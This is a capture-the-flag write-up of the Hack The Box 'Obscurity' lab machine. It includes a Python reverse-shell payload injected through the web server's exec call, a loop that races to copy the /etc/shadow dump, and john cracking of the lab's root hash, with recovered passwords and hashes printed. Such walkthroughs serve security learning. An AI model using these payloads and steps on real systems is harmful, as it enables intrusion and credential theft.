Posts Hack The Box - Obscurity Writeup
Post
Cancel

Hack The Box - Obscurity Writeup

First Steps

The first step as with most other boxes is to run nmap on the box.

Nmap

1
nmap -sC -sV -A nmap/nmap 10.10.10.168

Output

1
2
3
4
5
6
7
8
9
10
11
12
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 33:d3:9a:0d:97:2c:54:20:e1:b0:17:34:f4:ca:70:1b (RSA)
|   256 f6:8b:d5:73:97:be:52:cb:12:ea:8b:02:7c:34:a3:d7 (ECDSA)
|_  256 e8:df:55:78:76:85:4b:7b:dc:70:6a:fc:40:cc:ac:9b (ED25519)
80/tcp   closed http
8080/tcp open   http-proxy BadHTTPServer
|_http-server-header: BadHTTPServer
|_http-title: 0bscura
9000/tcp closed cslistener

PortService
22SSH
80HTTP
8080HTTP-proxy
9000cslistener

8080 - HTTP proxy

Since our port 80 is closed the first place to look is port 8080. We find that there is a custom web server application that is still under development.

The webpage has a message to dev’s stating the SuperSecureServer.py script is in the development directory.

Finding SuperSecureServer.py

Using the name of the script we can fuzz for the script on the server using dirbuster.

After a few moments we find the script in the /develop/ directory.

We can now run wget http://10.10.10.168:8080/develop/SuperSecureServer.py to download the web server source code.

Examining the source code we find the exec function passing the URL as a parameter.

1
exec(info.format(path)) # This is how you do string formatting, right?

Python Reverse shell

Using a python reverse shell script. We are able to connect to the box as the www-data user. This can be used in the URL as the function takes the path as an input.

1
2
3
10.10.10.168:8080/';s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect
(("10.10.14.16",4455));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash");'

Escalating to user

Looking through the directory structure of the box we find that we have access to /home/robert which contains a bunch of files relating to password encryption.

  • SuperSecureCrypt.py
  • passwordreminder.txt
  • out.txt
  • check

Using netcat to download these files to our local machine to work will preserve their data rather than copy and pasting file contents.

Examining the source code of the SuperSecureCrypt.py we discover it has a decrypt function by passing the arugment -d. The script takes an input file + a key file and creates an output file.

By passing the out.txt file found in the home folder with the check.txt file as a key we receive key used to decrypt the password.

1
python3 SuperSecureCrypt.py -d -i out.txt -o result.txt -k "$(cat check.txt)"
1
2
3
4
5
6
7
8
9
10
11
12
################################
#           BEGINNING          #
#    SUPER SECURE ENCRYPTOR    #
################################
  ############################
  #        FILE MODE         #
  ############################
Opening file out.txt...
Decrypting...
Writing to result.txt...
kali@kali:~/Desktop/Obscurity$ cat result.txt
alexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichaikali

Now that we have our key. We can use this in combination with our passwordreminder.txt file to find the password for robert

1
python3 SuperSecureCrypt.py -d -i passwordreminder.txt -o result.txt -k alexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichai
1
2
3
4
5
6
7
8
9
10
11
12
################################
#           BEGINNING          #
#    SUPER SECURE ENCRYPTOR    #
################################
  ############################
  #        FILE MODE         #
  ############################
Opening file passwordreminder.txt...
Decrypting...
Writing to result.txt...
kali@kali:~/Desktop/Obscurity$ cat result.txt
SecThruObsFTW

We now have user credentials

  • Username robert
  • Password SecThruObsFTW

Logging in with these credentials via SSH gives us access to the users home folder with permissions to open the user.txt file.

Escalating to root

Running sudo -l we find that we have permission to run sudo /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py as root.

Examining the script we can see that it looks like it opens the /etc/shadow file as root and dumps the contents to a tmp file to compare credentials for authentication.

Running this program and using the credentials for robert we find the message authenticated.

Given that the script loads the shadow file into the tmp directory we are able to read this file if we are able to catch the file.

Exploiting BetterSSH.py

To do this We create a script that we will run along side the BetterSSH script that will constantly perform a copy command on the directory /tmp/SSH.

Firstly we have to create the folder by running mkdir /tmp/SSH

We then create our copy.sh script in our home directory.

copy.sh

1
2
3
4
while [ 1 ]
do
copy /tmp/SSH/* .
done

Run this script with ./copy.sh and open a new SSH session in another terminal window as the same user.

Run the sudo /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py script in this new session and login with the credentials for robert.

After we have received the Authenticated message we will find a new file in the home folder. This will be the contents of the copied shadow file.

tmp file

1
2
3
4
5
6
7
8
9
10
11
12
13
root
$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1
18226
0
99999
7

robert
$6$fZZcDG7g$lfO35GcjUmNs3PSjroqNGZjH35gN4KjhHbQxvWO0XU.TCIHgavst7Lj8wLF/xQ21jYW5nD66aJsvQSP/y1zbH/
18163
0
99999
7

If we replace the line breaks with : we will turn the tmp file into a shadow file.

shadow

1
2
root:$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1:18226:0:99999:7
robert:$6$fZZcDG7g$lfO35GcjUmNs3PSjroqNGZjH35gN4KjhHbQxvWO0XU.TCIHgavst7Lj8wLF/xQ21jYW5nD66aJsvQSP/y1zbH/:18163:0:99999:7

Copy this to a file named shadow. To crack the shadow file we need to grab the contents of the passwd file first

Run cat /etc/passwd and copy the contents to a file named passwd.

Unshadow and crack

We now need to combine the two files to turn them into a crackable format for use with john.

running sudo unshadow passwd shadow > passwords.txt will combine the files and create a passwords.txt file.

Using this file with john combined with the rockyou.txt wordlist.

1
john passwords.txt --wordlist=/usr/share/wordlists/rockyou.txt

We find the password for root is mercedes.

Back to our SSH session if we su - and use the password mercedes we now have root access to this box.

Alternative Method

Looking at the permissions of the BetterSSH folder. We find that even though we do not have write permission to the script. We do have write permission on the folder.

With this we could rename the BetterSSH.py file to something else and create our own BetterSSH.py file that could escalate straight to a root shell.

This post is licensed under CC BY 4.0 by the author.